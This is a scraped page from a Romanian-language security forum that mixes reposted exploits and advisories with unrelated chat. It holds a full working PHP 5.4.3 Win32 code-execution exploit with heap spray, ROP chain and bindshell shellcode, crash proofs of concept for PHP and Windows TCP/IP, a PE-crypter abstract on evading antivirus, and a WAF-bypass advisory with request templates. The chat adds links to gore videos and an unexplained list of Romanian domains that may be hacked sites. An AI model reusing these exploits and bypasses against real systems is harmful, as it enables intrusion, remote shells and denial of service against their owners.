Nytro

[h=1]PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce[/h] <?php /* PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce Author : condis Date : 10.04.2012 AD Website : http://cond.psychodela.pl ---- Download : http://php.net/downloads.php Tested on: PHP 5.3.8 + Windows XP SP3 Professional PL PHP 5.3.10 + Windows XP SP3 Professional PL PHP 5.4.0 + Windows XP SP3 Professional PL PHP 5.4.3 + Windows XP SP3 Professional PL Description: wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant object when it is given as a first argument. Registers: EAX 00000000 ECX 1056AAE8 php5ts.1056AAE8 EDX 100EFCE0 php5ts.100EFCE0 EBX 01032AB0 ESP 00C0FAE0 EBP 00000000 ESI 0121E478 EDI 0121CB50 EIP 1028F22E php5ts.1028F22E Crash: 1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25] Situation looks pretty much the same for both wddx_serialize_vars and wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append have some problems with handling Variant object when given as a second argument: stream_bucket_append(1, new Variant(1)); stream_bucket_prepend(1, new Variant(1)); PS : Variant object is only available in PHP for Windows OS and it was implemented in PHP > 4.1.0 and PHP 5. For more details check : http://php.net/manual/en/class.variant.php PS2: After running this via webserver my Apache wasn't able to handle requests anymore and I had to restart him kthxbye */ wddx_serialize_value(new Variant(666)); ?> Sursa: PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce

Se vrea a trimite request-uri HTTP cu JavaScript (jsHTTP). Vezi sursa.

Sa isi porteze si Mozilla/Google browserele pe ARM si nu cred ca o sa fie probleme. Daca eram Microsoft ma pisam pe Mozilla si pe Google, nu bagam niciun "Browser choice", sa isi faca si Mozilla un sistem de operare, iar Google sa bage "Browser choice" pe Android, poate vreau sa folosesc Internet Explorer pe Android, e problema mea. Deci muie pretentiilor cu care vin Mozilla si Google.

Nu mai bine luati voi ban pe forum, in loc sa ajungeti la puscarie pentru niste rahaturi?

[h=3]WebVulScan - web application vulnerability scanner[/h][h=2]May 13, 2012[/h] WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found. After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited. The vulnerabilities tested by WebVulScan are: Reflected Cross-Site Scripting Stored Cross-Site Scripting Standard SQL Injection Broken Authentication using SQL Injection Autocomplete Enabled on Password Fields Potentially Insecure Direct Object References Directory Listing Enabled HTTP Banner Disclosure SSL Certificate not Trusted Unvalidated Redirects Features: Crawler: Crawls a website to identify and display all URLs belonging to the website. Scanner: Crawls a website and scans all URLs found for vulnerabilities. Scan History: Allows a user to view or download PDF reports of previous scans that they performed. Register: Allows a user to register with the web application. Login: Allows a user to login to the web application. Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default). PDF Generation: Dynamically generates a detailed PDF report. Report Delivery: The PDF report is emailed to the user as an attachment. This software was developed, and should only be used, entirely for ethical purposes. Running security testing tools such as this on a website (web application) could damage it. In order to stay ethical, you must ensure you have permission of the owners before testing a website (web application). Testing the security of a website (web application) without authorisation is unethical and against the law in many countries. Download: https://code.google.com/p/webvulscan/downloads/list Source: https://code.google.com/p/webvulscan/ Via: Defcamp

MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege Microsoft update release Microsoft Security Bulletin MS12-032 - Important : Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338) Possible MS12-032 Proof of concept from StackOverflow thx to @avivra We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines. // the program attempts to bind to IPV6-mapped IPV4 address // in a tight loop. If the address is not configured on the machine // running the program crashes Windows Server 2008 R2 (if program is 32-bit) #include #include #include #include #define IPV6_V6ONLY 27 void MyWsaStartup() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(2, 2); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) { printf("WSAStartup failed with error: %d\n", err); exit(-1); } } void main() { MyWsaStartup(); bool bindSuccess = false; while(!bindSuccess) { SOCKET sock = WSASocket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); if(sock == INVALID_SOCKET) { printf("WSASocket failed\n"); exit(-1); } DWORD val = 0; if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (const char*)&val, sizeof(val)) != 0) { printf("setsockopt failed\n"); closesocket(sock); exit(-1); } sockaddr_in6 sockAddr; memset(&sockAddr, 0, sizeof(sockAddr)); sockAddr.sin6_family = AF_INET6; sockAddr.sin6_port = htons(5060); // set address to IPV6-mapped 169.13.13.13 (not configured on the local machine) // that is [::FFFF:169.13.13.13] sockAddr.sin6_addr.u.Byte[15] = 13; sockAddr.sin6_addr.u.Byte[14] = 13; sockAddr.sin6_addr.u.Byte[13] = 13; sockAddr.sin6_addr.u.Byte[12] = 169; sockAddr.sin6_addr.u.Byte[11] = 0xFF; sockAddr.sin6_addr.u.Byte[10] = 0xFF; int size = 28; // 28 is sizeof(sockaddr_in6) int nRet = bind(sock, (sockaddr*)&sockAddr, size); if(nRet == SOCKET_ERROR) { closesocket(sock); Sleep(100); } else { bindSuccess = true; printf("bind succeeded\n"); closesocket(sock); } } }by d3v1l at 22:37 Sursa: Security-Shell: MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. [h=3]Introducing EMET v3[/h] swiat 15 May 2012 11:00 AM We are pleased to announce the release of a new version of our Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. EMET it is a free utility that helps prevent vulnerabilities in software from being successfully exploited for code execution. It does so by opt-ing in software to the latest security mitigation technologies. The result is that a wide variety of software is made significantly more resistant to exploitation – even against zero day vulnerabilities and vulnerabilities for which an update has not yet been applied. Download it here: Download: EMET - Microsoft Download Center - Download Details This new version of the tool being released today addresses top feedback themes we have heard from users: EMET needs more enterprise configuration, deployment and reporting options. We have seen growing interest in adoption from enterprise and large scale networks and this new version includes enhancements for that segment. Here are some of the highlights of and new features in EMET 3.0. Making configuration easy Enterprise deployment via Group Policy and SCCM Reporting capability via the new EMET Notifier feature Configuration EMET 3.0 comes with three default "Protection Profiles". Protection Profiles are XML files that contain pre-configured EMET settings for common Microsoft and third-party applications. Under EMET’s installation directory, these files are in the Deployment\Protection Profiles folder. You can enable them as-is, modify them, or create new protection profiles based on them. The three profiles that ship with EMET 3.0 are: Internet Explorer.xml: Enables mitigations for supported versions of Microsoft Internet Explorer. Office Software.xml: Enables mitigations for supported versions of Microsoft Internet Explorer, applications that are part of the Microsoft Office suite, Adobe Acrobat 8-10 and Adobe Acrobat Reader 8-10. All.xml: Enables mitigations for common home and enterprise applications, including Microsoft Internet Explorer and Microsoft Office. Looking inside a profile, we see a list of programs with EMET mitigations. The example below shows all EMET mitigations enabled for Windows Media Player, with the exception of Mandatory ASLR: <Product Name="Windows Media player"> <Version Path="*\Windows Media Player\wmplayer.exe"> <Mitigation Enabled="false" Name="MandatoryASLR"/> </Version> </Product> Notice the “*” in the Path attribute above? In EMET 3.0, we also expanded the EMET grammar rules. Existing rules that you might have continue to work as-is and it is possible now to also use wildcards in EMET rules. This means that you no longer have to use the full path of an application in EMET rules. You can use the “*” character or simply use the image name, such as “iexplore.exe” in your rules. EMET will protect them regardless of where these applications may be installed. This has been one of the most requested features. Deployment EMET also comes with built-in support for enterprise deployment and configuration technologies. This enables administrators to use Group Policy or System Center Configuration Manager to deploy, configure and monitor EMET installations across the enterprise environment. For Group Policy: EMET includes an ADMX file that contains the three protection profiles mentioned above as policies that can be enabled/disabled through group policy. There is also a policy that demonstrates how to add custom EMET settings. For System Center Configuration Manager: The SCCM team blog post this morning provides a package and instructions for integration with various SCCM features. Read that blog post here: Welcome to Windows Live Reporting With EMET 3.0, we have included an additional new reporting capability that we call "EMET Notifier". When you install EMET 3.0, this lightweight component is set to automatically start with Windows. It will show up in the notification area of your taskbar with an EMET 3.0 icon. EMET Notifier has two duties: Write events out to the Windows Event Log Show important events via a tooltip in the taskbar notification area EMET events are logged via the event source called EMET. These logs can be found in the Application log. There are three levels: Information, Warning and Error. Information messages are used for logging usual operation such as the EMET Notifier starting. Warning messages are used when EMET settings change. Error messages are used for logging cases where EMET stopped an application with one of its mitigations, which means an active attack has been blocked. An example entry can be seen below. In addition to the error messages written to the Windows Event Log, when an EMET mitigation stops (crashes) an application by blocking an exploit, a message is displayed for the user. A toast style taskbar notification states which application is being stopped and which mitigation is causing EMET to stop it. You can see an example below. Other EMET v3 developments In addition to these features, EMET 3.0 comes with a number of other improvements and bug fixes. More details and a FAQ can be found in the User Guide that comes with the install. However, we would like to specifically highlight a couple of things here. First, we have tested EMET 3.0 on the Windows 8 Consumer Preview and it works great - we encountered no problems at all so we encourage you to use EMET on all versions of Windows. Second, EMET 3.0 can be installed just fine on a system where EMET 2.1 (the previous release) was already installed. An upgrade or a new installation is no different. Your existing rules built for EMET 2.1 will continue to work just fine with EMET 3.0. Third, we would like to point out that EMET is an officially-supported Microsoft tool. That is a question we get a lot from enterprise customers. Microsoft's Customer Service & Support team offers forums-based support via Enhanced Mitigation Experience Toolkit (EMET) Support Forum. We in MSRC Engineering are also very eager to promote EMET and help you use it so we are quick to respond to feedback, ideas, suggestions, or questions via switech -at- microsoft -dot- com. Please do not hesitate to reach out to us. Acknowledgements I would like to thank Chengyun Chu, Elias Bachaalany, Elia Florio, Jinwook Shin, Neil Sikka, and Nitin Kumar Goel for their various contributions to this release. Also a big thank you to Jason Githens and Hema Rajalakshmi from the System Center Configuration Manager team for their help and support. - Suha Can, MSRC Engineering (EMET 3.0 release owner) Sursa: Introducing EMET v3 - Security Research & Defense - Site Home - TechNet Blogs

Da, deci e o porcarie, daca tot faci sniffing iei cookie/session, nu cred ca se face logare pe baza de IP sau mai stiu eu ce.

Hyperion: Implementation of a PE-Crypter Christian Ammann May 8, 2012 1 Introduction Runtime crypter accepts binary executable files as input and transforms them into an encrypted version (preserving its original behaviour). The encrypted file decrypts itself on startup and executes it’s original content. This approach allows the deployment of malicious executables in protected environments: A pattern based anti virus (AV) solution detects the signature of suspicious files and blocks their execution. The encrypted counterpart contains an unknown signature, it’s content can not be analysed by heuristics and is therefore executed normally without an intervention by the AV scanner. Other uses are protection of binaries against reversing or the replacement of the encryption routine with a packer to reduce the size of an executable. This paper reveals the theoretic aspects behind run-time crypters and describes a reference implementation for Portable Executables (PE) [1] which is the windows file format for dynamic-link libraries (DLLs), object files and regular executables. The encryption of Windows executables requires a general understanding of the following aspects: PE layout: The PE header, section headers and data directory entries. PE loader: How and where are process images loaded and executed in virtual memory. We give a beginner friendly introduction to these two important topics in section 2. Afterwards, we present and explain the PE crypter reference implementation Hyperion in section 3 for 32-bit executables which can be divided into two parts (see figure 1 for details): A crypter and a container. The crypter (which is explained in more detail in section 3.1) gets a PE binary as input, copies the complete input file into memory, calculates a checksum and prepends the checksum to the input file. Afterwards, a random key is generated which is used to encrypt the checksum and the input file with the AES-128 [2] encryption algorithm. Finally, the encrypted result is copied into the containers data section. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf

[h=1]PHP 5.4 (5.4.3) Code Execution (Win32)[/h] // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) =================== offset-brute.html =================== <html><body> <title>0day</title> <center> <font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br> <textarea rows=50 cols=50 id="log"></textarea> </center> <script> function sleep(milliseconds) { var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){ break; } } } function makeRequest(url, parameters) { var xmlhttp = new XMLHttpRequest(); if (window.XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); if (xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { // IE try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!xmlhttp) { alert('Giving up Cannot create an XMLHTTP instance'); return false; } xmlhttp.open("GET",url,true); xmlhttp.send(null); return true; } test=document.getElementById("log"); for(offset=0;offset<300;offset++) { log.value+="Trying offset:"+offset+"\r\n"; makeRequest("0day.php?offset="+offset); sleep(500); } </script></body></html> =================== 0day.php =================== <?php $spray = str_repeat("\x90",0x200); $offset=$_GET['offset']; // 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] $spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1); // :> 0x048d0030 $spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] $spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); // Adress of VirtualProtect 0x7c801ad4 $spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); // LPVOID lpAddress = 0x048d0060 $spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); // SIZE_T dwSize = 0x01000000 $spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 $spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); // __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068 $spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] $spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4); // Ret Address = 0x048d0080 $spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); $stacktrack = "\xbc\x0c\xb0\xc0\x00"; // Universal win32 bindshell on port 1337 from metasploit $shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0". "\x81\xc4\xd0\xfd\xff\xff". "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; $spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); $fullspray=""; for($i=0;$i<0x4b00;$i++) { $fullspray.=$spray; } $j=array(); $e=array(); $b=array(); $a=array(); $c=array(); array_push($j,$fullspray); array_push($e,$fullspray."W"); array_push($b,$fullspray."A"); array_push($a,$fullspray."S"); array_push($c,$fullspray."!"); $vVar = new VARIANT(0x048d0038+$offset); // Shoot him com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] echo $arr; echo $spray; ?> Sursa: PHP 5.4 (5.4.3) Code Execution (Win32)

Ok, cand ajung acasa diseara, spuneti pe mess sa nu uit.

Nu e pentru tine probabil.

Aaaaanntoneescuu de traiaaa...

Utilizatorului unu_1234567 i-a fost scos rangul de V.I.P. pentru ca a profitat de acest aspect pentru a castiga incredere. Nu va primi ban, in niciun caz, datorita contributiile sale, cei cu vechime vor intelege. Speram sa nu se repete. Ramane la latitudinea voastra sa decideti "castigatorul" moral al disputei si daca va veti implica in trade-uri cu ei, tineti insa cont ca amandoi sunt persoane care merita respect, desi multi probabil nu stiti nimic despre ei.

Nu sunt fake tinere, in Africa inca se ard femei pe rug pentru vrajitorie, realitatea e dura. In Tibet calugaritele isi dau foc singure: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore Self Immolation of a Nun in Tibet | Best Gore Apoi, in mijlocu "civilizatiei": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/

Pff, nu imi place cum e facuta libraria, exemplul http://rolling-curl.googlecode.com/svn/trunk/example_groups.php nu cred ca te ajuta. Foloseste curl simplu, cu curl_multi_exec.

Photoshop CS5 (12.04 parca) crapa, dar nu se executa shellcode-ul. Are cineva CS5.1 sa incerce?

[TABLE=width: 720] [TR] [TD]1.[/TD] [TD]casadinpitesti.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]2.[/TD] [TD]smartprices.info[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]3.[/TD] [TD]www.activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]4.[/TD] [TD]www.originalhandmade.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]5.[/TD] [TD]activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]6.[/TD] [TD]www.ice-tropez.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]7.[/TD] [TD]www.novelresearch.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]8.[/TD] [TD]www.perlamamaia.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]9.[/TD] [TD]daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]10.[/TD] [TD]www.daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]11.[/TD] [TD]www.enovate.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]12.[/TD] [TD]www.casa-agave.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]13.[/TD] [TD]www.uniromexim.ro[/TD] [TD]Whois [+][/TD] [/TR] [/TABLE] Prietenii stiu de ce.

Sunt baieti buni amandoi (din alte puncte de vedere), vom vedea diseara ce e de facut.

PHP-CGI Exploitation by Example - SpiderLabs Anterior

[h=1]Descarca BitDefender Total Security 2013 Beta – Testarea a inceput[/h] By Radu FaraVirusi(com) on May 7, 2012 BitDefender anunta lansarea produsului BitDefender Total Security 2013 Beta, care poate fi evaluat gratuit timp de 60 de zile. Ce noutati aduce? Device Anti-Theft USB Immunizer Windows Widget imbunatatiri aduse Parental Control, BitDefender SafeBox, MyBitDefender Dashboard Pentru a descarca BitDefender Total Security 2013 Beta accesati: Bitdefender Total Security 2013 BETA Sursa: Descarca BitDefender Total Security 2013 Beta – Testarea a inceput

[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h] BINAR10 Report on Fortinet Fortiweb Findings 02/05/2012 - Fortinet FortiWeb Web Application Firewall Policy Bypass - ============================================================ 1) Affected Product Fabricant: Fortinet Product name: FortiWeb Version: Latest update to Tue, 2 May 2012 Type: Web Application Firewall Product URL: http://www.fortinet.com/products/fortiweb/index.html 2) Description of the Findings BINAR10 has found a policy bypass occurrence when large size data is sent in POST (data) or GET request. 3) Technical Details 3.1. POST Request Example When is appended to a POST request any padding data that surpasses 2399 bytes, the WAF do not inspect the data sent and the request hits directly the application. This should occur when the product is not configured to block malformed requests, but this feature also check the POST size limit, blocking the request if it surpass a fixed limit, therefore is likely that is being disabled due to application requirements in medium size forms. The response is also not verified by the WAF and information disclosure occurs with details of the infrastructure. This bypass could be used to inject different types of vectors, as is shown in the example only is needed to append a new variable at the end of the POST data filled with arbitrary data that exceeds 2399 bytes. ---POST example POST /<path>/login-app.aspx HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes> var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes> 3.2. GET Requests The same issue with POST Request but it could be done through the sending arbitrary data at the end of the URL. --GET example http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data> 4. Validation Required It requires the validation of other researchers who have access to product. 5. Time Table 04/27/2012 - Vendor notified. 04/27/2012 - Vendor response, requiring some tests. 05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability. 6. Credits Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C. Sursa: Fortinet FortiWeb Web Application Firewall Policy Bypass

The curious case of Benjamin Button Sherlok Holmes Ring of the nibelungs The illusionist The librarian Butterfly effect Dark floors Room 1408 The cube The eye Triangle Nu neaparat psihologice, dar care merita vazute.